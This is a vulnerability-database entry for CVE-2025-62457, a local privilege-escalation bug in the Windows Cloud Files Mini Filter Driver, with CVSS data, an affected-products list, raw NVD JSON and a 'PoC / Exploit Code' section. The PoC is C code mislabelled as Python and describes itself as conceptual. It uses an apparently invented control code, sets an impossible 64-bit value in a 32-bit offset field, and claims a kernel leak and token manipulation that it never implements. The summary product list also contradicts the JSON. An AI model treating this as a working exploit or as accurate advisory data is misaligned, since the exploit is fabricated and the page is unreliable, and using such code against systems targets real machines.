Security Vulnerability Report
中文
CVE-2025-62457 CVSS 7.8 HIGH

CVE-2025-62457

Published: 2025-12-09 18:15:57
Last Modified: 2025-12-12 20:03:36

Description

Out-of-bounds read in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10 Version 1809 and earlier
Windows Server 2019 and earlier versions
Windows 11 21H2 and earlier
Windows Server 2022 and earlier
Windows Cloud Files Mini Filter Driver (specific versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62457 PoC - Windows Cloud Files Mini Filter Driver EoP // Based on the vulnerability description: Out-of-bounds read for privilege escalation #include <windows.h> #include <stdio.h> // This PoC demonstrates the conceptual approach for exploiting OOB read in Cloud Files Mini Filter // Actual exploitation requires specific conditions and target environment setup typedef struct _FILE_OBJECT_CONTEXT { PVOID DriverData; SIZE_T DataSize; UCHAR Data[256]; } FILE_OBJECT_CONTEXT, *PFILE_OBJECT_CONTEXT; BOOL TriggerOOBRead(HANDLE hFile) { // Technique: Create specific file patterns to trigger the vulnerable code path // The Cloud Files Mini Filter driver processes cloud sync metadata FILE_OBJECT_CONTEXT context = {0}; DWORD bytesReturned = 0; // Step 1: Initialize cloud file sync operation // This triggers Cloud Files Mini Filter to allocate and manage file context DeviceIoControl(hFile, 0x9C108400, // Cloud Files filter control code NULL, 0, &context, sizeof(context), &bytesReturned, NULL); // Step 2: Trigger OOB read by manipulating file offset // The driver may not properly validate buffer boundaries OVERLAPPED overlapped = {0}; overlapped.Offset = 0xFFFFFFFFFFFFFFFF; // Force out-of-bounds access char buffer[4096] = {0}; ReadFile(hFile, buffer, sizeof(buffer), &bytesReturned, &overlapped); // Step 3: Extract sensitive information from leaked kernel memory // Use leaked data to perform token manipulation printf("[+] Leaked %d bytes from kernel memory\n", bytesReturned); for (DWORD i = 0; i < bytesReturned && i < 64; i++) { printf("%02X ", (UCHAR)buffer[i]); } printf("\n"); return TRUE; } int main() { printf("[*] CVE-2025-62457 PoC - Cloud Files Mini Filter OOB Read\n"); printf("[*] Target: Windows with vulnerable Cloud Files Mini Filter Driver\n"); HANDLE hFile = CreateFile("C:\\Users\\Public\\Documents\\cloudtest.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("[-] Failed to create file\n"); return 1; } printf("[+] File created, triggering OOB read condition...\n"); TriggerOOBRead(hFile); CloseHandle(hFile); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62457", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:57.313", "lastModified": "2025-12-12T20:03:35.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "5CEB496A-8AF3-458D-B466-16204E535DE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "C99D0580-E443-4440-A211-19BA3C2C4AFA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6691", "matchCriteriaId": "9D04167A-522C-433E-8CEB-C1D8A02C23D8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6691", "matchCriteriaId": "A86D6CDC-55E5-4817-A6CE-4CE41921FB79"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6345", "matchCriteriaId": "6DCE32D0-A9E0-4029-AB35-5E202A42AF01"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "8DCD2A6E-7CD0-4FCC-AC11-5A1470776C24"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7392", "matchCriteriaId": "8EA08CDD-D682-403D-8B50-879EB4D88C67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "A20DBDB1-D0DE-4800-8BEA-35EE5D53659D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4467", "matchCriteriaId": "C552FBB4-8F98-492E-A084-AF14C9514A67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2025", "matchCriteriaId": "E9CE4A36-DA42-40CC-8724-E30A22CA84B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "35BBEADA-D039-479B-A1BA-B2A7E37235BE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62457", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}